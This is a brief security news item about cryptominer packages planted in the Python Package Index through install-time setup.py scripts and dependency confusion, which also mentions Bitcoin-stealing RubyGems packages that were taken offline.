Security News > 2021 > June > Cryptominers Slither into Python Projects in Supply-Chain Campaign

A group of cryptominers was found to have infiltrated the Python Package Index, which is a repository of software code created in the Python programming language.

It offers a place where coders can upload software packages for use by developers in building various applications, services and other projects.

A single malicious package can be baked into multiple different projects - infecting them with cryptominers, info-stealers and more, and making remediation a complex process.

In all of the packages, the malicious code is contained in a build script that runs during a package's installation, dubbed "Setup.py." This file downloads and runs a Bash script from GitHub.

The packages weaponized an earlier proof-of-concept code dependency-confusion exploit devised by security researcher Alex Birsan to inject rogue code into developer projects.

RubyGems, an open-source package repository and manager for the Ruby web programming language, took two of its software packages offline after they were found to be laced with Bitcoin-stealing malware.

News URL

https://threatpost.com/cryptominers-python-supply-chain/167135/